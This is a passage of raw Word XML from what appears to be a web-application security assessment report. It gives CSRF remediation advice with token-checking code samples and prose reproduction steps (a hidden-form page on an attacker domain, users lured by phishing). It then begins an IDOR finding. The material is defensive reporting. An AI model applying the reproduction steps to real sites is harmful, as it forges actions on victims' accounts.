      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.csrf_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> }}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B384F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>other form</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fields -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C0FBB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55045B63" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2332D8BB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Example (AJAX Header):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B149C2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>axios.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/action', data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ headers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">X-CSRF-Token': </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>csrf_token_from_meta_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C6790C9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-Side Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A4BDC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Upon receiving a state-changing request, retrieve the token from the request (form field or header) and compare it against the token stored in the user's session. Reject the request if the tokens do not match or if the token is missing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACEC6C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Example (Conceptual in Python/Flask):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6B93B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.route</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('/action', methods=['POST'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D1001" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>perform_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CBF511" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request.form.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F856D02" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>abort(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>403, description="CSRF token mismatch")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3CBC8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      # Process legitimate request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D7A45" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Utilize </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie Attribute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C686EE7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Set the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' attribute for all session-related cookies to 'Lax' or 'Strict'. 'Lax' generally provides good protection against CSRF by preventing browsers from sending cookies with cross-site requests initiated by third-party sites, while still allowing navigation (e.g., clicking a link). 'Strict' offers stronger protection but may impede </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>legitimate cross-site linking (e.g., if a user follows a link from another domain to a logged-in area). 'Lax' is a widely adopted balance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73527C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Example (HTTP Header):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C302C38" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Set-Cookie: JSESSIONID=abcde12345; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=Lax; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D63FF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Verify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7591E6A7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  While not a standalone solution due to browser inconsistencies and user privacy settings, verifying the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' header on critical requests can provide an additional layer of defense. Ensure the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' header matches the application's domain. This should always be used in conjunction with anti-CSRF tokens, never as the sole protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A9DA2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Consider Double-Submit Cookie Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8E518E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  If a stateless server design makes session-based token storage challenging, the double-submit cookie pattern can be employed. The server sends a cryptographically random value in a cookie </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> embeds the same value in a hidden form field or a custom header. The server then validates that the token in the cookie matches the token submitted with the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB783E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0E38D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Identify a state-changing action performed by an authenticated user in the application, such as changing a password, updating personal details, or submitting a form. For example, observe a request to /user/change-password.2. Intercept the legitimate request using a web proxy tool (e.g., Burp Suite).3. Analyze the request to confirm the absence of an anti-CSRF token or any other CSRF protection mechanism (e.g., origin header validation).4. Craft a malicious HTML page or script that mimics the legitimate request. This page would typically contain a hidden form with the same parameters as the legitimate request, targeting the application's endpoint.5. Host the malicious page on an attacker-controlled domain.6. Entice an authenticated user of the vulnerable application to visit the attacker-controlled page (e.g., via a phishing email or a malicious link).7. When the authenticated user visits the page, the malicious script or hidden form automatically submits the request to the vulnerable application using the user's authenticated session.8. Observe that the state-changing action is successfully executed in the vulnerable application without the user's explicit consent, confirming the CSRF vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114669F9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C2F73" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C953F3F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/352.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A82004" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E101E9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="231313EC"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0BF50E53"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2DF01B21" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Insecure Direct Object Reference (IDOR) Leading to Account Manipulation</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6F4D8505" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53334338"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2FF068F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0A6969B"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1EC9B4A" w14:textId="49C77B08"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-007</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D0E3DC6"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664B13F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.1 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4FADEEA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4F7DCF1"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3E3E424" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A01:2021-Broken Access Control</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8B403B4"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CFF0D4C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2E04634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EA978E6"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68FEF8A"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AE54EC1"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A0B4935" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7F050D2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9615948"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6AB0BBB"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AEDC00E"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ED98A0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7DF98557"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FD6D254"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F4FEB35"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7FF327C"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4409DFB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="687D4EAB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3FDDE6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
